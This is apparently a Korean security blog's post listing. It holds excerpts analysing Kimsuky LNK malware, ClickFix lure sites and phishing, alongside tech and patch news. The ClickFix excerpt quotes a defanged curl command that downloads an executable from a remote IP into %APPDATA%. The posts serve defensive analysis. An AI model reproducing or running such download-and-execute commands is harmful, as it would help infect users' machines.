오늘은 마이크로소프트 온라인 워드 사칭 ClickFix 공격 사이트 분석을 해보는 시간을 가져 보겠습니다.해당 클릭픽스(ClickFix) 사이트는 Microsoft Word Online인 것처럼 꾸미는 것이 특징입니다.여기서 The "Word Online" extension is not installed in your browser. To view the document offline, click the "How to fix" button. 이라는 부분처럼 How to fix 부분을 누르게 되면 다음과 같은 코드들이 실행합니다. const hiddenPart = 'cmd (/)c start "" /min curl -s -o %APPDATA%\\SearchIndex(.)exe hxxp://193(.)233..
7-Zip 버전 26.02는 공격자가 특수하게 제작된 압축 파일을 사용자가 열도록 유도하여 악성 코드를 실행할 수 있는 원격 코드 실행 취약점을 수정하기 위해 업데이트 되었습니다.룬분(Lunbun) 연구원 랜던 펭(Landon Peng)이 공개한 이 취약점은 7-Zip이 XZ로 압축된 데이터를 처리하는 과정에서 발생합니다.제로데이 이니셔티브(Zero Day Initiative) 의 권고에 따르면 특수하게 조작된 XZ 데이터는 힙 기반 버퍼 오버플로를 유발하여 공격자가 사용자 권한으로 임의 코드를 실행할 수 있도록 할 가능성이 있습니다. 제로데이 이니셔티브(Zero Day Initiative) 의 권고에 따르면 특수하게 조작된 XZ 데이터는 힙 기반 버퍼 오버플로를 유발하여 공격자가 사용자 권한으로 임의 ..
오늘은 Kimsuky(김수키)에서 만든 악성코드인 입력자료.lnk 에 대해서 글을 적어 보겠습니다.파일명:입력자료.lnk사이즈:1 MBMD5:8c0f1a9e261ffb4788efeaba88fcb5f3SHA-1:4f3d5d2f24d472f789bf55e6802c6cb1e23215f0SHA-256:eca45bd69ae2374cd5d9dd7373c03812bea53a3782e4cf24aae12c3d2cb41956악성코드 분석1.PowerShell 코드 실행$Savepath 명령어를 사용해서 미끼 엑셀 파일(.xlsx)을 추출해서 실행하기 위한 코드악성코드 내에서 파일 추출시작 오프셋:10,276바이트추출 길이:8,382바이트출력 파일: 입력자료.xlsx정상 XLSX처럼 보이는 데이터를 LNK 파일 뒤쪽에 붙여..
오늘은 직원 설문조사 보고서로 위장한 Remcos 트로이 목마 악성코드인 직원 설문조사 보고서.vbs 에 대해서 알아보겠습니다.Remcos는 일반적으로 피싱 공격을 통해 유포하는 트로이 목마이며 주로 송장 또는 주문이라고 위장을 하고 있으며 Remcos 특징은 다음과 같습니다.권한 상승:Remcos는 감염된 시스템에 대한 관리자 권한을 얻고 UAC(사용자 계정 제어)를 비활성화할 수 있습니다. 이런 방법을 통해서 공격자가 악성코드 실행이 더 쉬워집니다.방어 회피:Remcos는 프로세스 인젝션을 사용하여 합법적인 프로세스 내에 자신을 포함하므로 안티바이러스 이 탐지하기가 어려워지며 또한 악성코드는 백그라운드에서 실행되어 사용자로부터 자신을 숨길 수 있습니다.데이터 수집:Remcos 멀웨어의 핵심 기능 중 ..
마이크로소프트에서 제공하는 운영체제인 윈도우 10,윈도우 11 에 대한 KB5101650,KB5099414,KB5099539 보안 업데이트가 진행이 되었습니다.이번 보안 업데이트는 취약점 1건을 포함하여 총 570건의 취약점을 수정했습니다.254 권한 상승 취약점17가지 보안 기능 우회 취약점145가지 원격 코드 실행 취약점102가지 정보 유출 취약점35가지 서비스 거부 취약점16가지 스푸핑 취약점 이 수정이 되었습니다.Windows 10 KB5099539 신기능OLE 자동화(알려진 문제) 수정됨: 2026년 6월 보안 업데이트로 인해 발생한 OLE 자동화(oleaut32.dll)의 호환성 문제를 해결합니다.같은 기본 저장소를 공유하는 BYREF 매개변수를 사용하여 COM 메서드를 호출하기 위해 IDis..
오늘은 281개의 무료 안드로이드 VPN 앱 트래픽 유출 암호화되지 않은 데이터 사용자 추적 문제가 발견된 내용에 대해서 글을 적어 보겠습니다.연구원들은 구글 플레이 스토어에서 가장 인기 있는 무료 VPN 앱 281개를 새로운 테스트 시스템으로 분석한 결과 많은 앱들이 사용자들이 VPN을 설치하는 가장 기본적인 이유 즉 트래픽을 비공개로 안전하게 보호하는 기능을 제대로 수행하지 못하는 것으로 나타났다.하나 이상의 문제가 있는 것으로 표시된 앱들은 24억 회 이상 설치되었음문제는 복잡한 것이 아니라 기본적인 것들이며 29개의 앱은 암호화된 터널 외부로 사용자 트래픽이 유출되도록 허용하는데 여기에는 사용자가 방문하는 웹사이트를 드러내는 DNS 조회 정보도 포함되며 61개의 앱은 일부 데이터를 평문으로 전송하..
2008년 미국의 게이브리얼 와인버그(Gabriel Weinberg)가 만든 검색 엔진 이자 브라우저를 제공하는 DuckDuckGo 브라우저에서 YouTube 광고 차단 기능 내장을 한 브라우저를 출시했습니다.광고 차단 기능을 내장하여 대부분의 동영상 광고가 재생 전과 재생 중에 표시되지 않도록 차단을 하는 기능입니다.해당 기능은 iOS, Mac, Windows용 DuckDuckGo 최신 버전에서 기본적으로 활성화되어 있으며 안드로이드 사용자는 설정->광고 차단에서 수동으로 켤 수 있습니다.해당 시스템은 uBlock Origin에서 제공하는 커뮤니티 관리 필터 목록과 DuckDuckGo 자체 호환성 규칙을 함께 사용하면 광고 차단 기능은 DuckDuckGo에 내장된 YouTube 플레이어인 Duck Pl..
오늘은 북한 해킹 단체 Kimsuky(김수키) 에서 만든 악성코드인 전세 계약 특약 정리.lnk 에 대해서 알아보겠습니다. 해당 악성코드는 버팀목 전세 계약이라는 미끼 파일로 위장하고 있습니다.파일명:전세 계약 특약정리.docx.lnk사이즈:1 MBMD5:c489b3e9fce5646a2910765e25285984SHA-1:2f8a132c2eaaa32c9ad193c730aa69957e86f3cbSHA-256:69ab1ecc3c4571a2c136d9d9b8c16623507c895d16691e658903fef6a8f5f7dd악성코드 분석1.hidden -Command 를 사용한 사용자 몰래 실행-WindowStyle Hidden를 사용을 하기 때문에 PowerShell 창은 악성코드 감염이 된 사람에게는 악성..
오늘은 윈도우 11 권한 로그 파일 인한 500GB 이상의 저장 공간을 소모할 수 있는 버그 해결 방법에 대해서 알아보겠습니다.마이크로소프트는 Capability Access Manager의 사전 기록(write-ahead) 로그 파일이 압축되지 않은 채 지속적으로 증가해서 해당 문제가 발생한 시스템에서 500GB 이상의 드라이브 공간을 차지할 수 있는 Windows 11 버그를 확인이번 수정 사항은 빌드 26200.8737 및 26100.8737이 포함된 업데이트 KB5095093에 포함되어 있음사용자는 Windows Update의 선택적 업데이트를 통해 업데이트를 설치하거나 2026년 7월 패치 화요일(Patch Tuesday) 한국시각으로는 수요일에 배포에 포함될 때까지 기다릴 수 있습니다.해당 문..
오늘은 북한 해킹 단체에서 만든 악성코드 공동경비구역 JSA 방문자 복장 및 규정 및 MACHA(군사정전위원회 본부구역)를 사칭을 한 악성코드인 UNIMAC Policy Letter 6 MACHA Visitors 에 대해서 분석을 해 보겠습니다.파일명:UNIMAC Policy Letter 6 MACHA Visitors.pdf.lnk사이즈:1 MBMD5:8f5d4324561d9e52646800f3c12f3ec7SHA-1:367dbdd01c6f779a5ad133ed2a621f5fe8ea66e6SHA-256:173eba07c3b6caccbf64c72af605d3aaab453d1e577bafc2038254997a7b726e일단 악성코드 동작 과정은 간단합니다. 먼저 사용자가 파일을 실행합니다.실행을 해서 사용자..
Flipper Devices는 Flipper Zero 펌웨어의 개발이 계속 될 것이라고 말하지만, 내부 팀은 더 작은 내부 팀과의 커뮤니티 기여에 대한 의존도가 높아졌습니다.해당 발표는 가제트 제조업체가 Flipper One 오픈 Linux 플랫폼과 같은 새로운 장치를 구축하는 데 집중하기로 함에 따라 제공되며 이를 위해 회사는 개발을 완료하는 데 커뮤니티의 도움을 주었습니다.주의력 결핍 과잉 행동 장애 (ADHD)를 가진 사람들이 미국, 영국,유럽 및 캐나다에서 7월 14일에 공개 판매를 위해 예정된 산만 함을 줄일 수 있도록 새로 출시된 Busy Bar 장치도 있습니다.Flipper Devices는 Flipper Zero 휴대용 펜 테스트 장치의 공식 펌웨어는 여전히 유지되지만 풀 타임 기능 개발은 ..
2026년 7월 2일에 공개된 브라우저의 안정화 버전 배포 노트에 따르면 마이크로소프트는 Windows 및 macOS용 Edge 버전 150에서 Google 계정을 통한 로그인 기능을 추가이제부터는 사용자는 Microsoft 계정과 함께 Google 계정으로 로그인할 수 있습니다.해당 기능은 두 플랫폼의 모든 Microsoft Edge 사용자에게 점진적으로 적용되고 있으며 시스템 관리자는 새로운 NonMicrosoftAccountSignInEnabled 정책을 사용하여 기능의 사용 여부를 관리할 수 있습니다.이번 변경 사항은 2020년 마이크로소프트가 구글 서비스를 엣지에 기본적으로 통합할 계획이 없다고 밝혔던 입장과는 정반대의 행보이며 해당 기능 추가는 지난 6월 마이크로소프트 365 로드맵을 통해 처..
오늘은 한국방송통신대학교 학사 일정 사칭 악성코드인 (첨부파일 1) 2026학년도 주요 학사일정 안내.lnk 에 대해서 알아보겠습니다.파일명:(첨부파일 1) 2026학년도 주요 학사일정 안내.lnk사이즈:1 MBMD5:23b895522bef3c76879ee050d3564255SHA-1:819dd13f0b16cf7769b79207bac9dbd3c1c3cf00SHA-256:cce863d31f184108c7e38d6e76fb5ed4c04909c7a2c99039236dcc64af722dfe악성코드 분석먼저 해당 악성코드는 사용자가 실행했을 때 실행이 되는지 모르게 실행을 합니다.C:\Users\Public\Pictures 에 먼저 파일 삭제 C:\Users\Public\Videos\ 에 작업 스케줄러에 등록 후..
일단 예상 시나리오는 북한 해커의 예상 부분은 私見 이므로 알아서 생각하시고 걸러내시면 됩니다. FBI와 CISA는 러시아 정보기관과 연계된 시그널(Signal) 사용자를 표적으로 한 피싱 캠페인이 시그널 백업 복구 키를 탈취하는 방식으로 진화했으며 해당 백업 복구키 탈취 시 공격자들이 피해자의 과거 메시지에 접근할 수 있게 되었다고 경고이번에 발표된 공지는 2026년 3월 발표된 권고문의 업데이트 버전으로 당시에는 위협 행위자들이 종단 간 암호화를 해독하기보다는 계정을 탈취하기 위해 고안된 피싱 캠페인을 통해 상용 메시징 앱 특히 시그널 사용자를 표적으로 삼고 있다고 경고발표된 FBI 공익 공지에 따르면 RIS(러시아 정보기관) 사이버 위협 행위자들은 업데이트된 피싱 메시지에서 여전히 자동화된 CMA ..
오늘은 저격 게임 SNIPER ELITE 3(스나이퍼 엘리트 3) 에 대해서 글을 적어 보겠습니다.먼저 시스템 요구 사항운영체제: Windows Vista, 7, 8프로세서: Intel Pentium® D 3GHz,AMD Athlon™ 64 X2 4200메모리: 2GB그래픽 카드:NVIDIA GeForce® 8800,AMD Radeon™ HD 3870API:DirectX 11저장 공간: 18GB최적화가 엄청나며 저가형 컴퓨터 노트북에서도 잘 돌아가는 게임입니다.전작처럼 자동 체력 회복 시스템이 아니라 체력 시스템을 가지고 스나이퍼 엘리트 V2처럼 심각한 부상이 아니라면 어느 정도 자동 회복이 되는 중간적인 체력 시스템을 가지는 게임입니다.자동 회복으로 채워지지 않는 체력은 붕대(2칸)나 구급상자(전체)로..
제프리스(Jefferies) 주식 연구는 앞으로 몇 분기 동안 메모리 가격이 크게 상승할 것으로 전망되고 있으며 2028년 이전에는 가격 상승세가 크게 완화되지 않을 것으로 예측됩니다.회사는 2026년 3분기에 메모리 가격이 40~50% 상승하고 4분기에는 추가로 30~40% 상승할 것으로 예상하고 있으며이후 상승 압력은 지속하여 2027년에는 전년 대비 40~45% 상승할 것으로 전망2028년에는 회복세가 예상되지만, 가격 하락폭은 15~20% 정도로 제한적일 것으로 보입니다.제프리스의 전망과 메모리 가격 위기의 원인제프리스의 전망은 현재까지 발표된 메모리 가격 예측 중 가장 신중한 편에 속하며 Wccftech가 보도한 수치로는 해당 추이는 다음과 같습니다.2026년 3분기:가격 40~50% 상승202..
KTM 모바일 알뜰폰 셀프 개통(자가 개통) 방법 및 친구초대 이벤트 가입 방법에 대해 알아보겠습니다.일단 개인적으로 해당 KTM 모바일 알뜰폰 을 사용을 하고 있다가 전화번호가 하나 더 필요해서 어차피 태블릿 쪽을 유모바일 사용을 하고 있다가 KT M모바일은 케이티아이에스(kt is)의 자회사 케이티엠모바일에서 운영하는 MVNO 통신사를 하는 것으로 옮기기로 하고 해당 KTM 모바일 알뜰폰 쪽으로 셀프개통을 진행을 하기로 했습니다.어차피 메인폰 KT, 인터넷 KT, 업무용 폰도 KT인데 그냥 KT로 그냥 다 통일하는 것이 좋을 것 같아서 해당 태블릿을 KT로 변경해 버렸습니다.친구 추천 1만5천원 요금제 가입시 개인당:최대 15만원 지급 가입시 3만원 혜택 입니다.일단 유심은 편의점에서 구매하든 쿠팡 ..
오늘은 김수키(Kimsuky) 개인정보 유출 의심 확인 요청으로 유포되는 악성코드인 고객현황_202604.lnk 에 대해서 알아보겠습니다.해당 악성코드는 기업의 실무 담당자를 대상으로 삼아 여러 차례 메일을 주고받으며 신뢰를 쌓고 악성 파일을 실행하도록 유도하는 방식으로 방심을 유도해서 악성코드를 실행하게 유도를 하는 방식을 사용하고 있습니다.파일명: 고객현황_202604.lnk사이즈:1 MBMD5:8151604ea33d487de589e20ad65e4705SHA-1:22386fd2cf7cd4310ae1fe228fed2a7a78f71cf6SHA-256:7d3896807be6b294332a5daacd8e7eddddba893c6f6277103fd768056f4264b6악성코드 분석해당 악성코드는 Windows..
마이크로소프트에서 제공하는 운영체제인 윈도우 10 에 대해서 2027년10월까지 ESU 지원 연장을 발표했습니다.마이크로소프트는 일반 사용자를 위한 Windows 10 확장 보안 업데이트(ESU) 프로그램의 적용 기간을 1년 더 연장되었습니다.해당 ESU 프로그램에 등록된 기기는 2027년 10월 12일까지 계속해서 보안 업데이트를 받을 수 있습니다.이번 변경 사항은 공식 발표 없이 이루어졌으며 마이크로소프트의 Windows 10 ESU 문서 업데이트와 전날 게시된 Windows Experience 블로그 게시물의 편집자 주를 통해 확인되었습니다.원래 소비자용 ESU 프로그램은 2026년 10월 12일에 종료될 예정이었지만 해다 ESU 등록된 사용자들은 2027년 10월의 2027년 종료일까지 계속 지원..
오늘은 Kimsuky(김수키) 로 추정되는 악성코드인 [별첨1]_사고인지_유형별_증빙자료_예시-최종.lnk 에 대해서 분석을 해보겠습니다. 해당 악성코드는 공격 대상은 보험사, 금융사, 보안팀, 감사팀, 법무팀, 총무팀 등으로 추정할 수가 있습니다.파일명:[별첨1]_사고인지_유형별_증빙자료_예시-최종.lnk사이즈:42 MBMD5:300bb48d11bc5d2b9ac558ec8e830882SHA-1:eeee1e0defa10f3791a3f00d804637f008ea4e07SHA-256:c534df540c66e8578cf8400280cf8d8a4ed7a21a93fda27ec2e29e912f0dacaf분석악성코드는 문자열 치환 방법으로 난독화 돼 있으며 예를 들어서 4=p,37=o,48=w,29=e는 이런 방식으..
오늘은 서울 교육청 직원을 노린 피싱 이메일 분석하는 시간을 가져 보겠습니다. 일단 해당 발신자는 다음과 같습니다.info@itechs(.)live그리고 피싱 제목은 [긴급] 구버전 이메일 ???@sen(.)go(.)kr 업데이트 및 조치 요청로 되어져 있습니다.안녕하세요, ???님.현재 사용 중이신 이메일의 모든 구버전을 종료할 예정입니다.계정이 비활성화되는 것을 방지하고 보다 체계적인 편지함을 이용하시려면, 아래 버튼을 눌러 로그인해 주시기 바랍니다. 지금 업그레이드하기 감사합니다.sen(.)go(.)kr 웹메일 지원팀 드림이번은 서울 교육청 웹메일 지원팀이라고 돼 있지만, 사실은 아님이메일 헤더 분석정상적인 sen(.)go(.)kr 발신 메일이 아닌 외부 도메인 itechs(.)live를 이용해 ..
오늘은 macOS 사용자를 대상으로 한 ClickFix 공격 사이트 인 grapefruitfilenexus 분석에 대해서 분석을 해 보겠습니다. 일단 정확하지는 않지만 Grapefruit(그레이프프루트) 즉 Mac을 사용해 아이폰 앱에 보안 취약점이 없는지 혹은 어떻게 만들어졌는지 해킹 및 보안 분석을 하는 도구 사이트로 위장하고 있지 않을까? 생각이 들기도 합니다.hxxp://grapefruitfilenexus(.)com/해당 사이트는 일단 기본적으로 hxxp 로 인증서가 없는 것이 보이고 여기서 함정으로 GitHub 으로 되어 있는 것이 보일 것입니다. 해당 GitHub 하고는 상관없습니다. 일단 정확히는 맥 사용자를 노리는 클릭픽스(ClickFix) 사이트입니다.여기서 보면 다음과 같은 사이트 주소..
애플은 블루투스 안의 범위에 있는 공격자가 사용자의 대화를 엿들을 수 있게 하는 Beats Studio Buds 무선 이어버드에 영향을 미치는 고위험 결함을 수정하기 위한 보안 업데이트를 출시했습니다.애플은 화요일 발표된 권고문에서, 블루투스 안의 범위에 있는 공격자가 아직 페어링되지 않았고 페어링 요청을 적극적으로 수신 중인 기기의 마이크를 통해 대화를 엿들을 수 있다고 설명했습니다.이는 오픈 소스 코드의 취약점이며, 애플 소프트웨어도 영향을 받는 프로젝트 중 하나입니다. CVE-ID는 제3자에 의해 할당되었습니다.애플은 Beats Firmware Update 1B211 을 통해 이 취약점을 수정해당 업데이트는 취약한 헤드폰이 페어링된 상태에서 사용자의 아이폰, 아이패드 또는 맥의 블루투스 범위 내에 ..
록스타 게임즈는 Grand Theft Auto 6 사전 예약이 2026년 6월 25일에 시작된다고 발표이와 함께 스튜디오는 게임의 공식 커버 아트도 공개했으며 현재 록스타 웹사이트에서 확인할 수 있습니다.해당 게임은 2026년 11월 19일 플레이스테이션 5와 엑스박스 시리즈 X|S 용으로 출시될 예정PC 버전은 아직 확정되지 않았습니다.이번 선주문 일정은 록스타의 광범위한 마케팅 전략의 목적으로 테이크투 인터랙티브는 여름 동안 전략의 강도가 더욱 높아질 것이라고 밝힌 바 있습니다.GTA 6 선주문 시작 시 제공되는 혜택 및 선주문 방법록스타는 스페셜 에디션이나 단계별 선주문 패키지,가격,구체적인 선주문 보너스 등 세부 사항을 아직 발표하지 않았습니다.GTA 온라인이 10년 넘게 GTA 5를 지원해 온 ..
오늘은 김수키(Kimsuky) 개인정보 유출 의심 확인 요청으로 유포되는 악성코드-고객현황_202604.lnk 에 대해서 알아보겠습니다. 해당 악성코드는 기업의 실무 담당자를 대상으로 삼아 여러 차례 메일을 주고받으며 신뢰를 쌓고 악성 파일을 실행하도록 유도하는 방식을 사용하고 있습니다.파일명:2603vvip고객현황.lnk사이즈:1 MBMD5:c8ce5c23d4644aa089455c479e52dae3SHA-1:c0bd4da40aa929e0f6f851781728719ec71b88baSHA-256:7f9fe5839a2ffaa627685f673ee5d4ba5a30857c24d4cf141ab408c7a18e3f4a분석1.LNK 실행현재 경로에서 크기가 정확히 121,594 bytes 인 .lnk 파일을 찾고공격..
모질라는 파이어폭스의 무료 내장 VPN에 대한 대역폭 제한을 일시적으로 해제하여 해당 사용자들이 8월 31일까지 무제한으로 인터넷을 이용할 수 있도록 합니다.이번 프로모션을 통해 이용 가능한 지역도 기존 28개국으로 확대되며 9월 1일부터는 VPN이 월 50GB의 표준 대역폭 제한과 축소된 지역 목록으로 복귀파이어폭스 내장 VPN은 서비스가 제공되는 지역에서 파이어폭스와 함께 무료로 제공모질라는 올해 초 해당 서비스를 출시했으며 출시 2개월 만에 100만 명 이상의 가입자를 기록했다고 밝혔습니다.Firefox 내장 VPN은 사용 가능한 지역에서 Firefox와 함께 무료로 포함되어 있으며 Mozilla는 올해 초 이를 도입했으며 출시 후 2개월 이내에 100만 명 이상의 가입을 보고프로모션 중에 Fire..
오늘은 북한 Kimsuky(김수키)에서 만든 악성코드-260506_한국 핵추진잠수함 협력 전략과 로드맵.pdf.lnk 에 대해서 글을 적어 보겠습니다. 일단 해당 악성코드는 Base64로 인코딩되어 있고 깃허브(GitHub)에서 더미 파일을 다운로드 하는 방식을 사용하고 있으며 더미 파일은 확보 못 했으니까? 그냥 악성코드 자체로만 분석하겠습니다.파일명: 260506_한국 핵추진잠수함 협력 전략과 로드맵.pdf.lnk사이즈:1 MBMD5:8406075af0a1e9ec09bafdc0de01f138SHA-1:2b381a3f3e303da8832c8b60120aa6f7486264bfSHA-256:4453b9e985f452365995c399f5292c92764570f03e6a066d7845320dd4ad09a1일..
오늘은 윈도우 권한 상승 취약점인 GreenPlasma Poc 에 대해서 알아보겠습니다. 일단 해당 취약점 패치는 2026년 6월 10일 보안 업데이트 에서 해결된 취약점입니다. GreenPlasma (CVE-2026-4558) 로 불리는 취약점은 Windows 로컬 권한 상승 문제이며 공개된 코드는 숙련된 공격자가 더 높은 권한을 획득하기 위해 발전시킬 수 있는 기반을 제공하는 코드이며 이번 취약점 공개의 중요성은 Nightmare-Eclipse 취약점 공개 범위가 Windows Defender 관련 취약점을 넘어 더 광범위한 Windows 내부 문제로 확장되었음을 보여준다는 점입니다.분석1.Native API 사용해당 코드는 일반 Win32 API뿐 아니라 ntdll.dll 에서 직접 Native A..
Apple은 WWDC 2026에서 macOS 27 Golden Gate를 발표했으며 Intel Mac에 대한 지원이 종료되고 Google Gemini가 제공하는 상당히 업그레이드 된 Siri AI를 도입한다는 소식입니다.새로운 운영 체제는 올가을 출시될 것으로 예상이 되며 Siri AI(시리 AI)는 올해 말 영어 사용자를 위해 베타 버전으로 제공macOS 27 골든 게이트 호환성: Apple Silicon 전용macOS 27에는 Apple 실리콘이 필요하며 macOS 26 Tahoe를 여전히 지원하는 4개의 Intel 모델:019의 16 인치 MacBook Pro, 2020 iMac 및 2019 Mac Pro를 포함하여 모든 Intel Mac이 제외호환성 장치MacBook Neo (2026년 이후),A..
오늘은 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 파동에너지 이론 2026년 5월 개정판.lnk 에 대해서 글을 적어 보겠습니다. 일단 파동에너지 가 무언인지 몰라서 검색을 해보니 파동에너지 이론은 차트 에서 가격 움직임을 파동으로 해석하고 이동평균선(이평선)의 기울기, 역학관계와 스토캐스틱 등을 결합해 시장 참여자의 심리와 추세 방향을 읽는 트레이딩 분석하는 것으로 나와져 있었습니다.뭐~일단 투자 관련 서적 PDF를 미끼로 해서 악성코드를 감염시켜 실행하는 방식입니다.파일명:파동에너지 이론 2026년 5월 개정판.lnk사이즈:7 MBMD5:9ccc09d36ce870c571a86f1496d54f46SHA-1:8f9136878a8da6e4efee9a7cf2934e7449a1b4dfSHA-2..